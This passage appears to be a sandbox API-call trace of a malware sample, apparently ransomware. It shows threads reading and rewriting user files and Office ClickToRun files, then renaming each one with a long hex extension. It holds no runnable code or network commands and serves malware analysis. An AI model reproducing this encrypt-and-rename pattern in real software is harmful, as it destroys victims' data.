IoStatusBlock=0x72aff4c, FileInformation=0x4333b68, Length=0x124, FileInformationClass=0xa) returned 0x0 [0172.075] CloseHandle (hObject=0x5f0) returned 1 [0172.077] GetProcessHeap () returned 0x270000 [0172.079] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75325a8 | out: hHeap=0x270000) returned 1 [0172.086] RtlInterlockedCompareExchange64 () returned 0x9 [0172.086] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0172.086] NtQueryObject (in: Handle=0x5f4, ObjectInformationClass=0x1, ObjectInformation=0x755a7b0, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x755a7b0, ReturnLength=0x72aff5c) returned 0x0 [0172.087] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpString2=".51AAD519F9EB2E5C0B1A060258A5CB55678B5C711F2F5B8C3F88B36584086C7B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.51AAD519F9EB2E5C0B1A060258A5CB55678B5C711F2F5B8C3F88B36584086C7B") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.51AAD519F9EB2E5C0B1A060258A5CB55678B5C711F2F5B8C3F88B36584086C7B" [0172.087] GetProcessHeap () returned 0x270000 [0172.087] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x43349c8 [0172.088] NtSetInformationFile (FileHandle=0x5f4, IoStatusBlock=0x72aff4c, FileInformation=0x43349c8, Length=0x120, FileInformationClass=0xa) returned 0x0 [0172.101] CloseHandle (hObject=0x5f4) returned 1 [0172.102] GetProcessHeap () returned 0x270000 [0172.104] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a700 | out: hHeap=0x270000) returned 1 [0172.106] RtlInterlockedCompareExchange64 () returned 0x8 [0172.106] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff) Thread: id = 111 os_tid = 0xad0 [0142.356] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.283] ReadFile (in: hFile=0x594, lpBuffer=0x74401a0, nNumberOfBytesToRead=0x5600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068) returned 1 [0155.284] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.303] WriteFile (in: hFile=0x594, lpBuffer=0x74401a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068) returned 1 [0155.304] RtlInterlockedCompareExchange64 () returned 0x0 [0155.304] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.305] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7420118, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7420118, ReturnLength=0x73dfc54) returned 0x0 [0155.306] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat", lpString2=".95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat.95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat.95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26" [0155.306] GetProcessHeap () returned 0x270000 [0155.306] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x192) returned 0x432e108 [0155.306] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x432e108, Length=0x192, FileInformationClass=0xa) returned 0x0 [0155.308] CloseHandle (hObject=0x594) returned 1 [0155.331] GetProcessHeap () returned 0x270000 [0155.332] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7420068 | out: hHeap=0x270000) returned 1 [0155.332] RtlInterlockedCompareExchange64 () returned 0x1 [0155.332] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.340] ReadFile (in: hFile=0x590, lpBuffer=0x74401a0, nNumberOfBytesToRead=0x5200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068) returned 1 [0155.341] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.355] WriteFile (in: hFile=0x590, lpBuffer=0x74401a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068) returned 1 [0155.356] RtlInterlockedCompareExchange64 () returned 0x0 [0155.356] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.375] WriteFile (in: hFile=0x58c, lpBuffer=0x7420190*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7400058 | out: lpBuffer=0x7420190*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7400058) returned 1 [0155.377] RtlInterlockedCompareExchange64 () returned 0x0 [0155.377] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.422] WriteFile (in: hFile=0x5a0, lpBuffer=0x747b318*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.423] RtlInterlockedCompareExchange64 () returned 0x0 [0155.423] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.435] WriteFile (in: hFile=0x5a0, lpBuffer=0x747b318*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.437] RtlInterlockedCompareExchange64 () returned 0x0 [0155.437] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.781] WriteFile (in: hFile=0x5a0, lpBuffer=0x747b318*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.781] RtlInterlockedCompareExchange64 () returned 0x0 [0155.782] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.782] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x745b290, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x745b290, ReturnLength=0x73dfc54) returned 0x0 [0155.783] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml", lpString2=".12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B" [0155.783] GetProcessHeap () returned 0x270000 [0155.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1fc) returned 0x318780 [0155.783] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x73dfc44, FileInformation=0x318780, Length=0x1fc, FileInformationClass=0xa) returned 0x0 [0155.785] CloseHandle (hObject=0x5a0) returned 1 [0155.872] GetProcessHeap () returned 0x270000 [0155.874] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x745b1e0 | out: hHeap=0x270000) returned 1 [0155.874] RtlInterlockedCompareExchange64 () returned 0x1 [0155.874] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.941] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0155.942] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.943] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0155.945] RtlInterlockedCompareExchange64 () returned 0x0 [0155.945] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.946] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7422118, ReturnLength=0x73dfc54) returned 0x0 [0155.947] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2=".CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49" [0155.947] GetProcessHeap () returned 0x270000 [0155.947] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b8) returned 0x42fc110 [0155.947] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x42fc110, Length=0x1b8, FileInformationClass=0xa) returned 0x0 [0155.949] CloseHandle (hObject=0x594) returned 1 [0155.952] GetProcessHeap () returned 0x270000 [0155.954] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0155.954] RtlInterlockedCompareExchange64 () returned 0x1 [0155.954] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.958] ReadFile (in: hFile=0x590, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0155.958] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.959] WriteFile (in: hFile=0x590, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0155.960] RtlInterlockedCompareExchange64 () returned 0x0 [0155.960] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.961] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x744a270, ReturnLength=0x73dfc54) returned 0x0 [0155.962] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml", lpString2=".82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430" [0155.962] GetProcessHeap () returned 0x270000 [0155.962] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a0) returned 0x31e318 [0155.962] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x73dfc44, FileInformation=0x31e318, Length=0x1a0, FileInformationClass=0xa) returned 0x0 [0155.963] CloseHandle (hObject=0x590) returned 1 [0155.969] GetProcessHeap () returned 0x270000 [0155.970] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0155.970] RtlInterlockedCompareExchange64 () returned 0x1 [0155.970] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.974] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0155.975] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.975] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0155.976] RtlInterlockedCompareExchange64 () returned 0x0 [0155.976] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.977] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7422118, ReturnLength=0x73dfc54) returned 0x0 [0155.978] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2=".14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458" [0155.978] GetProcessHeap () returned 0x270000 [0155.978] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a6) returned 0x4277c78 [0155.978] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x4277c78, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0155.983] CloseHandle (hObject=0x594) returned 1 [0155.990] GetProcessHeap () returned 0x270000 [0155.991] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0155.991] RtlInterlockedCompareExchange64 () returned 0x1 [0155.991] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.996] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0155.997] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.998] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.000] RtlInterlockedCompareExchange64 () returned 0x0 [0156.000] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.001] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7422118, ReturnLength=0x73dfc54) returned 0x0 [0156.002] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2=".54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734" [0156.002] GetProcessHeap () returned 0x270000 [0156.002] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1ac) returned 0x42869e0 [0156.002] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x42869e0, Length=0x1ac, FileInformationClass=0xa) returned 0x0 [0156.004] CloseHandle (hObject=0x594) returned 1 [0156.028] GetProcessHeap () returned 0x270000 [0156.029] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.029] RtlInterlockedCompareExchange64 () returned 0x1 [0156.029] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.032] WriteFile (in: hFile=0x594, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0156.034] RtlInterlockedCompareExchange64 () returned 0x0 [0156.034] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.035] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x744a270, ReturnLength=0x73dfc54) returned 0x0 [0156.036] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml", lpString2=".5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677" [0156.036] GetProcessHeap () returned 0x270000 [0156.036] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19a) returned 0x3364d0 [0156.036] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x3364d0, Length=0x19a, FileInformationClass=0xa) returned 0x0 [0156.038] CloseHandle (hObject=0x594) returned 1 [0156.039] GetProcessHeap () returned 0x270000 [0156.040] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0156.045] RtlInterlockedCompareExchange64 () returned 0x1 [0156.045] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.223] ReadFile (in: hFile=0x594, lpBuffer=0x7492450, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0156.224] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.239] WriteFile (in: hFile=0x594, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0156.240] RtlInterlockedCompareExchange64 